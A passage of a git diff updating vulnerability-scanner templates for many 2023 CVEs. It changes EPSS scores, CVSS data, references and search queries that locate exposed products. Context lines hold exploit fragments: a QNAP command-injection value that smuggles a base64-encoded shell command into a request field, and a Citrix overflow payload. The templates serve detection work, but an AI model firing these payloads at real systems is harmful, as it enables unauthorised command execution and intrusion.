classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.7 cve-id: CVE-2023-45671 - cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:* + cwe-id: CWE-79 + epss-score: 0.00924 + epss-percentile: 0.82924 + cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: frigate product: frigate shodan-query: title:"Frigate" + fofa-query: title="frigate" + google-query: intitle:"frigate" tags: cve,cve2023,frigate,xss http: diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index e8da8a88ed..934220426c 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 - epss-score: 0.00254 - epss-percentile: 0.6331 + epss-score: 0.02217 + epss-percentile: 0.89475 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: papercut product: papercut_ng shodan-query: html:"content=\"PaperCut\"" + fofa-query: body='content="papercut' + google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut http: diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 051ed6b3d3..40fc014d4b 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-45852 cwe-id: CWE-77 - epss-score: 0.09217 - epss-percentile: 0.94519 + epss-score: 0.10555 + epss-percentile: 0.95011 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: product: vitogate_300_firmware shodan-query: title:"Vitogate 300" fofa-query: title="Vitogate 300" + google-query: intitle:"vitogate 300" tags: cve2023,cve,rce,vitogate,viessmann http: diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 60276771a7..1a9ba0747d 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -13,18 +13,20 @@ info: reference: - https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2023-45855 + - https://qdpm.net classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-45855 cwe-id: CWE-22 - epss-score: 0.00087 - epss-percentile: 0.35946 + epss-score: 0.00318 + epss-percentile: 0.70433 cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* metadata: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 + fofa-query: icon_hash=762074255 tags: cve,cve2023,qdpm,lfi http: diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 26ca18e549..048586acff 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 - epss-score: 0.08202 - epss-percentile: 0.93732 + epss-score: 0.07197 + epss-percentile: 0.94017 cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,9 +26,10 @@ info: vendor: incsub product: forminator framework: wordpress + shodan-query: http.html:/wp-content/plugins/forminator + fofa-query: body=/wp-content/plugins/forminator publicwww-query: /wp-content/plugins/Forminator tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub - variables: string: "CVE-2023-4596" diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 91e3ac4e08..83b1983004 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4634 cwe-id: CWE-73 - epss-score: 0.02012 - epss-percentile: 0.88618 + epss-score: 0.01686 + epss-percentile: 0.87686 cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: davidlingren product: media_library_assistant framework: wordpress + shodan-query: http.html:wp-content/plugins/media-library-assistant + fofa-query: body=wp-content/plugins/media-library-assistant publicwww-query: "wp-content/plugins/media-library-assistant" tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 53c778381e..c99a76fed6 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46347 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31923 + epss-score: 0.04018 + epss-percentile: 0.92057 cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 7aeae95268..f314c1bc5d 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -10,13 +10,22 @@ info: reference: - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/ - https://nvd.nist.gov/vuln/detail/CVE-2023-46359 + - http://hardy.com + - https://github.com/d4n-sec/d4n-sec.github.io + - https://github.com/fkie-cad/nvd-json-data-feeds classification: - cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.6 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-46359 + cwe-id: CWE-78 + epss-score: 0.1382 + epss-percentile: 0.95642 + cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: hardy-barth + product: cph2_echarge shodan-query: html:"Salia PLCC" tags: cve2023,cve,salia-plcc,cph2,rce diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 7406de95e5..bc3ad91ddb 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46574 cwe-id: CWE-77 - epss-score: 0.05804 - epss-percentile: 0.9323 + epss-score: 0.20185 + epss-percentile: 0.96341 cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: totolink product: a3700r_firmware shodan-query: title:"Totolink" + fofa-query: title="totolink" + google-query: intitle:"totolink" tags: cve,cve2023,totolink,router,iot,rce http: diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index d7ded59e4a..3995d27988 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46747 cwe-id: CWE-306,CWE-288 - epss-score: 0.97202 - epss-percentile: 0.99806 + epss-score: 0.97116 + epss-percentile: 0.9979 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev variables: username: "{{hex_encode(rand_base(5))}}" diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 996e6d04f4..403d79c66c 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -16,15 +16,17 @@ info: cvss-score: 8.2 cve-id: CVE-2023-46805 cwe-id: CWE-287 - epss-score: 0.96274 - epss-percentile: 0.99497 + epss-score: 0.96558 + epss-percentile: 0.99613 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2023,kev,auth-bypass,ivanti + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" + tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti http: - raw: diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 0992e66fc7..89ad645b26 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4714 cwe-id: CWE-200 - epss-score: 0.50923 - epss-percentile: 0.9748 + epss-score: 0.68074 + epss-percentile: 0.97962 cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index deccc8b7f6..87d67af3ce 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -16,13 +16,15 @@ info: cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.00164 - epss-percentile: 0.52059 + epss-percentile: 0.52964 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer shodan-query: "http.title:\"OpManager Plus\"" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive http: diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index ca420a4377..0b526d6316 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -3,7 +3,7 @@ id: CVE-2023-47218 info: name: QNAP QTS and QuTS Hero - OS Command Injection author: ritikchaddha - severity: high + severity: medium description: | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later. reference: @@ -11,17 +11,19 @@ info: - https://twitter.com/win3zz/status/1760224052289888668/photo/3 - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/ - https://nvd.nist.gov/vuln/detail/CVE-2023-47218 + - https://www.qnap.com/en/security-advisory/qsa-23-57 classification: - cvss-metrics: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 8.3 - cwe-id: CWE-78 + cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 5.8 cve-id: CVE-2023-47218 + cwe-id: CWE-77 + epss-score: 0.00305 + epss-percentile: 0.69699 metadata: verified: true max-request: 2 shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" tags: cve,cve2023,qnap,qts,quts,rce,intrusive - variables: file: '{{rand_base(6)}}' cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index 44cfc8776b..cb7aeefff9 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-47246 cwe-id: CWE-22 - epss-score: 0.94354 - epss-percentile: 0.99149 + epss-score: 0.94622 + epss-percentile: 0.99239 cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index da286fdd08..6ebb7cc060 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -13,19 +13,23 @@ info: reference: - https://github.com/salesagility/SuiteCRM-Core/security/advisories/GHSA-fxww-jqfv-9rrr - https://nvd.nist.gov/vuln/detail/CVE-2023-47643 + - https://www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-47643 cwe-id: CWE-200 - epss-score: 0.00063 + epss-score: 0.06214 + epss-percentile: 0.93569 cpe: cpe:2.3:a:salesagility:suitecrm:8.4.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - product: suitecrm vendor: salesagility + product: suitecrm shodan-query: title:"SuiteCRM" + fofa-query: title="suitecrm" + google-query: intitle:"suitecrm" tags: cve,cve2023,graphql,suitecrm,introspection http: diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 67ded92e4f..b043a74b62 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -14,20 +14,23 @@ info: - https://github.com/bucketcat/CVE-2023-48084 - https://github.com/Hamibubu/CVE-2023-48084 - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-48084 cwe-id: CWE-89 epss-score: 0.00114 - epss-percentile: 0.44333 + epss-percentile: 0.44856 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: nagios product: nagios_xi + shodan-query: http.title:"nagios xi" fofa-query: title="Nagios XI" + google-query: intitle:"nagios xi" tags: cve,cve2023,nagiosxi,sqli,authenticated http: diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index d756062547..9810fff72f 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49070 cwe-id: CWE-94 - epss-score: 0.84671 - epss-percentile: 0.98424 + epss-score: 0.79399 + epss-percentile: 0.98282 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index a1a1d94f6c..539685ae88 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -27,6 +27,8 @@ info: vendor: owncloud product: graph_api shodan-query: title:"owncloud" + fofa-query: title="owncloud" + google-query: intitle:"owncloud" tags: cve2023,cve,owncloud,phpinfo,config,kev http: diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 04f7011d2b..096227b72e 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo - epss-score: 0.96486 - epss-percentile: 0.9956 + epss-score: 0.9671 + epss-percentile: 0.99651 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: citrix product: netscaler_application_delivery_controller shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" + fofa-query: title="citrix gateway" || title:"netscaler gateway" + google-query: intitle:"citrix gateway" || title:"netscaler gateway" tags: cve,cve2023,citrix,adc,info-leak,kev,exposure variables: payload: '{{repeat("a", 24812)}}' diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 9094021c35..4a33bfc64c 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -22,7 +22,7 @@ info: product: academy_lms shodan-query: html:"Academy LMS" fofa-query: body="Academy LMS" - tags: cve2023,cve,academylms,xss,creativeitem + tags: packetstorm,cve2023,cve,academylms,xss,creativeitem http: - method: GET diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 41734343b9..3ffd6a8b45 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4974 cwe-id: CWE-89 - epss-score: 0.01914 - epss-percentile: 0.87302 + epss-score: 0.02153 + epss-percentile: 0.89309 cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: creativeitem product: academy_lms shodan-query: html:"Academy LMS" + fofa-query: body="academy lms" tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem http: diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index d63794ba0e..c0272ab872 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-49785 cwe-id: CWE-79 epss-score: 0.00049 - epss-percentile: 0.1584 + epss-percentile: 0.17861 metadata: verified: true max-request: 2 diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 37f74e205f..bc43c29665 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -14,15 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-5003 - epss-score: 0.00084 - epss-percentile: 0.35074 + epss-score: 0.00419 + epss-percentile: 0.7409 cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress - verified: true - max-request: 1 tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin http: diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 970e880864..e62cd38424 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2023-50290 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.05452 - epss-percentile: 0.92995 + epss-percentile: 0.93157 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: solr shodan-query: "title:\"Apache Solr\"" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve,cve2023,apache,solr,exposure http: diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 9c0ebc96d2..0a9a14c4a2 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5074 cwe-id: CWE-798 - epss-score: 0.01695 - epss-percentile: 0.87453 + epss-score: 0.01843 + epss-percentile: 0.88296 cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index 1036b74c92..0e7d731d2a 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-5089 - epss-score: 0.00306 - epss-percentile: 0.6923 + epss-score: 0.00291 + epss-percentile: 0.69035 cpe: cpe:2.3:a:wpmudev:defender_security:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: wpmudev product: defender_security framework: wordpress + shodan-query: http.html:/wp-content/plugins/defender-security/ + fofa-query: body=/wp-content/plugins/defender-security/ publicwww-query: "/wp-content/plugins/defender-security/" tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 2d94b93d85..1fdec9b021 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-50917 cwe-id: CWE-77 - epss-score: 0.71101 - epss-percentile: 0.97965 + epss-score: 0.70095 + epss-percentile: 0.98019 cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index ac84dea108..154cbf4add 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-50968 cwe-id: CWE-918,CWE-200 - epss-score: 0.32266 - epss-percentile: 0.96905 + epss-score: 0.23447 + epss-percentile: 0.96556 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index b8baaab188..3907840d23 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-51467 cwe-id: CWE-918 - epss-score: 0.68495 - epss-percentile: 0.97894 + epss-score: 0.58267 + epss-percentile: 0.97731 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index b038059ace..8a3512d641 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-52085 cwe-id: CWE-22 epss-score: 0.00256 - epss-percentile: 0.64798 + epss-percentile: 0.65415 cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:* metadata: max-request: 4 @@ -23,6 +23,7 @@ info: product: winter shodan-query: "title:\"Winter CMS\"" fofa-query: "title=\"Winter CMS\"" + google-query: intitle:"winter cms" tags: cve,cve2023,authenticated,lfi,wintercms http: diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index f3c8722b3c..19f3a9805d 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5244 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.2616 + epss-score: 0.00176 + epss-percentile: 0.54692 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2023,huntr,xss,microweber http: diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 583aa0b3bf..9f2a231ddf 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 - epss-score: 0.96723 - epss-percentile: 0.99637 + epss-score: 0.96512 + epss-percentile: 0.99596 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -27,9 +27,10 @@ info: vendor: royal-elementor-addons product: royal_elementor_addons framework: wordpress + shodan-query: http.html:/plugins/royal-elementor-addons/ + fofa-query: body=/plugins/royal-elementor-addons/ publicwww-query: "/plugins/royal-elementor-addons/" tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive - variables: file: "{{to_lower(rand_text_alpha(5))}}" string: "CVE-2023-5360" diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 7cb9ec08d1..9f508251d1 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5375 cwe-id: CWE-601 - epss-score: 0.00083 - epss-percentile: 0.339 + epss-score: 0.00092 + epss-percentile: 0.39191 cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 07dd43ff62..059474be63 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -18,13 +18,14 @@ info: cve-id: CVE-2023-5556 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26117 + epss-percentile: 0.27592 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 + fofa-query: icon_hash=1199592666 tags: cve,cve2023,xss,structurizr,oos,authenticated variables: str: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 51fd449d81..7a1fd69f82 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2023-5830 cwe-id: CWE-287 epss-score: 0.00427 - epss-percentile: 0.73911 + epss-percentile: 0.74333 cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: documentlocator product: document_locator shodan-query: 'title:"Document Locator - WebTools"' + fofa-query: title="document locator - webtools" + google-query: intitle:"document locator - webtools" tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools http: diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 2dbeb41235..4ef598c820 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -17,13 +17,14 @@ info: cve-id: CVE-2023-5914 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.3876 + epss-percentile: 0.39942 cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:* metadata: max-request: 1 vendor: cloud product: citrix_storefront shodan-query: html:"/Citrix/StoreWeb" + fofa-query: body="/citrix/storeweb" tags: cve,cve2024,xss,citrix,storefront http: diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index da1a165a5d..5fd55b51f8 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5991 cwe-id: CWE-22 - epss-score: 0.00603 - epss-percentile: 0.78412 + epss-score: 0.17487 + epss-percentile: 0.96115 cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: motopress product: hotel_booking_lite framework: wordpress + shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking + fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 4d957bdc53..2a4d6687e3 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6018 cwe-id: CWE-78 epss-score: 0.86232 - epss-percentile: 0.98502 + epss-percentile: 0.98574 cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + 